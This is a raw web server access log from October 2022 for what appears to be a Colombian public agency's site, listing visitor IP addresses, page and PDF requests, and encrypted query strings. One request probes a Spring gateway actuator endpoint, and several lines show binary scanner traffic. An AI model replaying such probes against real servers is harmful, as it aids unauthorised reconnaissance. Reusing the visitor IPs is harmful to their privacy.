186.102.4.168 - - [25/Oct/2022:01:35:44 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/SaxdA0cea1gw3K6D62673zUHYY9YU0H/8X+Amlk7r34MT7ND6KIZqoEJQbq576w2LMtiC63FSeTZsJVqCa4ajSPvR1pQiHTdrWh4218zHSIdvCTjGwUuMMDJzLntrW4Db9rXmg0ixtq0ZVeDrAH7SmU7UutmDDZqRBt5qi8q+PJSr95A4aHxjkXzzLVg2V+6qMo+vkZFfjwyPJtNmSLb7FXpzA8RjB+IjZUcx/WJIK+Y6aSvRyB5UJU3CVn9TPae4MYLM3sESIQ==&u=U2FsdGVkX188R8qHOZ6e5h3vsjCbpMX/Xe8LXwCb9cU=&y=U2FsdGVkX18T4yYA188rZ9T40O+aXXudhBtocwCLxSmPCRL5P5tPQDYFfAbN90bD HTTP/1.1" 200 26
186.102.4.168 - - [25/Oct/2022:01:35:45 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX188R8qHOZ6e5h3vsjCbpMX/Xe8LXwCb9cU=&y=U2FsdGVkX18T4yYA188rZ9T40O+aXXudhBtocwCLxSmPCRL5P5tPQDYFfAbN90bD HTTP/1.1" 200 26
186.102.4.168 - - [25/Oct/2022:01:35:45 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/uJseU5uGyqagzKRWmyu1MTD9QJqJ8X8hDTIU7Uk4+9wn5ylt0Vx7HcSogGhCsZug+q94pYofKazijZhFMFjKSEoDay8AD9K+IKQK06JAvlAyiuIceelnr/IkLCJNE3pXdgesW743DLhKm1NdPgAMTGSNxcF/Q3fU=&u=U2FsdGVkX188R8qHOZ6e5h3vsjCbpMX/Xe8LXwCb9cU=&y=U2FsdGVkX18T4yYA188rZ9T40O+aXXudhBtocwCLxSmPCRL5P5tPQDYFfAbN90bD HTTP/1.1" 200 26
186.102.4.168 - - [25/Oct/2022:01:35:45 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+rgPZ44qnJ55Y2LDWTlApExj/uRk8Xxu2FtzkOLcfk9pIH95PFzECQPtLq8w4ZpjMLbFIkXPi9lDO6dsX1I0F1ASQe+Ab33IAhuyMdE+tOlIzvtBIjvBL4ooJalA9ZLhe/CC+EHAlCRKS//GPlzA5USIynczioBH8=&u=U2FsdGVkX188R8qHOZ6e5h3vsjCbpMX/Xe8LXwCb9cU=&y=U2FsdGVkX18T4yYA188rZ9T40O+aXXudhBtocwCLxSmPCRL5P5tPQDYFfAbN90bD HTTP/1.1" 200 25
186.102.4.168 - - [25/Oct/2022:01:35:45 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/ySbr+sCv5knP6ATfdRcGS3PbfNgdra+IwjGJ4+V44rJ7o77ppLw3kK94qKxSNzWmmPH8oUM/bNXriBl0aZlJ3Wa4RlW5yhzTe2IK4jP/n4mSYIaP3phdBS3v1DOaKJNjCGDe9EswoyNCNAkXTlNg4pMRJpdQ2NXc=&u=U2FsdGVkX188R8qHOZ6e5h3vsjCbpMX/Xe8LXwCb9cU=&y=U2FsdGVkX18T4yYA188rZ9T40O+aXXudhBtocwCLxSmPCRL5P5tPQDYFfAbN90bD HTTP/1.1" 200 25
186.102.4.168 - - [25/Oct/2022:01:35:46 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+uYDwuBKLTq6jZG7ekFjZTl8w4CYcmtX8r0ZZW/rJstOvyEboNbfI6eKTkk2W80Z/l7x3ez/KIRZtZzEzu4S47S4UhFffsxl+rCDg0f72blFcDsNhNYi9uzJ3N4XbQfsjdkfAjJNroDTlQ5Gn3WUSTY5G8YPMSkOFFva/To4ZGj8LGQyquRfl3&u=U2FsdGVkX188R8qHOZ6e5h3vsjCbpMX/Xe8LXwCb9cU=&y=U2FsdGVkX18T4yYA188rZ9T40O+aXXudhBtocwCLxSmPCRL5P5tPQDYFfAbN90bD HTTP/1.1" 200 25
201.245.192.253 - - [25/Oct/2022:01:35:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
172.22.2.4 - - [25/Oct/2022:01:35:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
51.159.164.227 - - [25/Oct/2022:01:38:33 -0500] "GET / HTTP/1.1" 200 319
51.159.164.227 - - [25/Oct/2022:01:38:34 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.245.221.92 - - [25/Oct/2022:01:40:11 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:01:38:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [25/Oct/2022:01:40:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
172.22.2.4 - - [25/Oct/2022:01:39:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58955
201.245.192.253 - - [25/Oct/2022:01:42:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44071
201.245.192.253 - - [25/Oct/2022:01:42:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41932
64.124.8.21 - - [25/Oct/2022:01:43:42 -0500] "GET /galeria/nivo-slider/demo/demo.html HTTP/1.1" 404 1018
216.245.221.92 - - [25/Oct/2022:01:45:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Oct/2022:01:45:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
172.22.2.4 - - [25/Oct/2022:01:45:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [25/Oct/2022:01:44:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:01:45:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55630
20.191.45.212 - - [25/Oct/2022:01:47:31 -0500] "GET / HTTP/1.1" 200 319
20.191.45.212 - - [25/Oct/2022:01:47:31 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.245.221.92 - - [25/Oct/2022:01:50:11 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:01:50:44 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
201.245.192.253 - - [25/Oct/2022:01:50:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
172.22.2.4 - - [25/Oct/2022:01:50:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:01:51:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
36.37.185.77 - - [25/Oct/2022:01:53:48 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
216.245.221.92 - - [25/Oct/2022:01:55:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Oct/2022:01:55:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
192.109.145.231 - - [25/Oct/2022:01:56:12 -0500] "GET /galeria/nivo-slider/demo/images/BANNER%20VAN%20DER%20HAMMEN.jpg HTTP/1.1" 304 -
207.46.13.79 - - [25/Oct/2022:01:56:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1344.pdf HTTP/1.1" 304 -
172.22.2.4 - - [25/Oct/2022:01:56:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:01:57:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
216.245.221.92 - - [25/Oct/2022:02:00:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Oct/2022:02:00:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
172.22.2.4 - - [25/Oct/2022:02:02:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:02:03:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [25/Oct/2022:02:05:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Oct/2022:02:05:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
172.22.2.4 - - [25/Oct/2022:02:06:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [25/Oct/2022:02:08:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [25/Oct/2022:02:10:11 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:02:08:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [25/Oct/2022:02:10:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
40.77.167.69 - - [25/Oct/2022:02:11:43 -0500] "GET /portaldeninos/parque-mirador-de-los-nevados/ HTTP/1.1" 200 89855
172.22.2.4 - - [25/Oct/2022:02:14:29 -0500] "GET /BLA/boletinlegal/actuator/gateway/routes HTTP/1.1" 404 1018
207.46.13.18 - - [25/Oct/2022:02:15:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 200 370932
216.245.221.92 - - [25/Oct/2022:02:15:11 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:02:13:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [25/Oct/2022:02:15:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
172.22.2.4 - - [25/Oct/2022:02:14:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
207.46.13.84 - - [25/Oct/2022:02:18:13 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/NormatividadPEV.pdf HTTP/1.1" 200 96211
181.51.48.104 - - [25/Oct/2022:02:18:29 -0500] "-" 408 -
64.124.8.45 - - [25/Oct/2022:02:19:07 -0500] "GET /isolucionsda/ HTTP/1.1" 302 168
64.124.8.45 - - [25/Oct/2022:02:19:18 -0500] "GET /Isolucionsda/PaginaLogin.aspx HTTP/1.1" 404 1018
165.227.196.154 - - [25/Oct/2022:02:19:25 -0500] "\x8c\x80\xa4Nv\xd4? 3 \xc4j`$\xbf\xa0\x0f\xbdcI/\x99!I\x95\x15\xe0\xe2#\x99!I.\x9dcI/\x99\"A/\x99!I/\x99!I\x85\x99!I/\x99" 400 226
165.227.196.154 - - [25/Oct/2022:02:19:25 -0500] "\x16\x03\x01" 400 226
165.227.196.154 - - [25/Oct/2022:02:19:25 -0500] "\x16\x03\x01" 400 226
165.227.196.154 - - [25/Oct/2022:02:19:25 -0500] "\x16\x03\x01" 400 226
193.118.53.194 - - [25/Oct/2022:02:19:55 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [25/Oct/2022:02:20:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Oct/2022:02:20:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
199.16.157.180 - - [25/Oct/2022:02:20:55 -0500] "-" 408 -
199.16.157.180 - - [25/Oct/2022:02:20:55 -0500] "-" 408 -
172.22.2.4 - - [25/Oct/2022:02:19:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
